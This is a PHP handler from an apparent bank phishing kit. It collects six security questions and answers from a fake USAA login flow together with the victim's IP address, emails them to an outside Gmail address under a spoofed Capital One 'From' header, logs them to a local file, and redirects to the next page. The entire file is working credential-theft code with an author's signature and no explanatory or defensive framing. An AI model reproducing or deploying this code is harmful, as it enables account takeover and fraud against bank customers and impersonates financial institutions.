<?
$ip = getenv("REMOTE_ADDR");

$message .= "----------= Usaa PIN Info =---------\n";

$message .= "question1 : ".$_POST['question1']."\n";
$message .= "answer1 : ".$_POST['answer1']."\n";

$message .= "question2 : ".$_POST['question2']."\n";
$message .= "answer2 : ".$_POST['answer2']."\n";

$message .= "question3 : ".$_POST['question3']."\n";
$message .= "answer3 : ".$_POST['answer3']."\n";

$message .= "question4 : ".$_POST['question4']."\n";
$message .= "answer4 : ".$_POST['answer4']."\n";

$message .= "question5 : ".$_POST['question5']."\n";
$message .= "answer5 : ".$_POST['answer5']."\n";

$message .= "question6 : ".$_POST['question6']."\n";
$message .= "answer6 : ".$_POST['answer6']."\n";


$message .= "1P : ".$ip."\n";

$message .= "-------= Kreated BY lizzyrose/billiondollarsman =-------\n";

$send = "billiondollarsman2015@gmail.com";

$subject = "Capital ONE | $ip";

$headers = "From: USAA LoGin<customer-support@capitalone.com>";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen("logs.txt","a");
fputs($fp,$message);
fclose($fp);
	
		   header("Location: index3.php");

	 
?>